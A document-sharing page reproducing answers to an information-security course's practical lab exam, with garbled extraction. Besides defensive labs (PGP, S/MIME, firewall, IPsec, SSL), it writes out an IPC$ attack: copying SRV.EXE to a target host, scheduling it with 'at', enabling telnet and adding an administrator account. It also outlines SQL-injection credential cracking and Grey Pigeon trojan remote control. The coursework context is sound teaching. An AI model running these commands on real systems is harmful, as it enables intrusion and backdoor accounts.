《信息安全技术与实施-实操考试是题答案(共41页).doc》由会员分享,可在线阅读,更多相关《信息安全技术与实施-实操考试是题答案(共41页).doc(41页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、精选优质文档-倾情为你奉上网络安全技术实验net share zzz=d:zzz 共享d:zzz 共享名为zzznet use ipzzz 123 /user:zero用户zero密码123连接共享copy ipzzzxxx.xxx C:xxx.xxx从共享复制xxx.xxx到C:xxx.xxx添加管理员用户net user zero 123 /add 添加zero用户 密码为123net localgroup administrators zero /add添加zero到administrators用户组ftp open ?.?.?.?用户名 密码put x:xxx.xxx 上传get xx
2、x.xxx x:xxx.xxx 下载bye 退出-IPC$攻击net use ipipc$ /user: copy C:Server.exe ipipc$计划任务net time ip 查看ip当前时间at ip time Server.exetelnet ip添加管理员用户如上题一.熟悉常见的系统命令在命令行下完成以下命令的功能使用:Net share(创建共享文件夹)C:md 56C:net share 56=c:5656 共享成功。Net use(访问并复制共享文件夹中的内容到本地计算机)net use ipzzz 123 /user:zero用户zero密码123连接共享copy ip
3、zzzxxx.xxx C:xxx.xxx从共享复制xxx.xxx到C:xxx.xxxNet user(创建用户账号、并将用户添加到管理员组)ftp(完成FTP的上传、下载)(一) IPC$攻击利用IPC$漏洞对未打补丁的Windows计算机实施攻击主要步骤:1. 扫描IPC$计算机2. 将Server.exe程序上传到目标机器E:实验工具IPC$攻击工具net use E:实验工具IPC$攻击工具copy E:实验工具IPC$攻击工具SRV.EXE 192.168.1.11e$SRV.EXE3. 为目标计算机指定计划任务E:实验工具IPC$攻击工具at 192.168.1.11 19:33 s
4、rv.exe4. 用Telnet命令连接sc 192.168.1.11 start tlntsvrtelnet 192.168.1.115. 添加管理员账号E:net user lijietian sotian /addE:net localgroup administrators lijietian /add(二) SQL注入漏洞提权1. 将嘉枫文章管理系统发布到IIS上2. 用domain4.1进行旁注检测3. 猜解表名4. 猜解列名5. 破解用户名、密码6. 管理入口扫描7. 用得到的管理员账号登录(三) 电子邮件安全(PGP)用PGP实现电子邮件的加密/签名和解密/校验1. 配置Out
5、look Express可正确收发邮件2. 产生密钥对3. 导入对方公钥4. 签名并信任对方公钥5. 成功发送加密邮件,成功解密密文6. 成功发送签名邮件,正确验证签名7. 成功发送加密并签名邮件,正确解密校验邮件(四) 电子邮件安全(S-MIME)用Outlook Express自带的安全功能实现电子邮件的加密/签名和解密/校验1. 配置Outlook Express可正确收发邮2. 下载安装CA证书3. 申请并下载安装电子邮件安全证书4. 获得对方的数字标识5. 成功发送加密邮件,成功解密密文6. 成功发送签名邮件,正确验证签名7. 成功发送加密并签名邮件,正确解密校验邮件(五) 防火墙I
6、SA Server 2004通过配置防火墙策略实现如下内容1. 在ISA主机上安装IIS,并配置Web服务,网站首页为自己的姓名和学号;2. 配置防火墙策略允许另一台计算机可以访问Web页面;3. 在另一台非ISA主机上安装配置POP3服务,并配置邮件服务;4. 配置防火墙策略允许ISA主机访问邮件服务。 正确安装IIS,并配置Web服务,首页正确 防火墙策略:允许访问web服务,验证正确 正确安装POP3服务,并建立域和邮箱,能提供邮件服务 防火墙策略:允许ISA主机访问邮件服务,可收发邮件(六) IP安全策略实现两台计算机之间所有IP通信的安全传输(要求使用证书进行身份验证)1. 下载并安
7、装CA证书,使之成为受信任的根证书颁发机构;2. 分别为两台主机申请并安装客户端身份证书;3. 配置IP安全策略(要求安全通信),要求仅在特定的两台主机之间实现IP安全通信4.5. 能够完成IP安全通信,并验证。(可使用网络监视器或IPSec监视器捕获查看)SSL用SSL实现Web服务器和客户端(浏览器)之间的安全通信(要求客户端证书)。1. 在IIS的Web服务器中,生成证书申请文件;2. 为IIS的Web服务器申请证书;3. 下载并安装该证书;4. 配置Web服务器,申请SSL安全通道,并要求客户端证书;5. 为客户机的浏览器申请浏览器证书并下载、安装。 6. 两台主机之间能够进行通信(访问网站),要求网站的主页显示自己的学号和姓名(七) 灰鸽子用灰鸽子实现远程控制1. 正确配置服务器程序(即木马);2. 实现对肉机的控制(关闭/开启服务,远程重启或关机)专心-专注-专业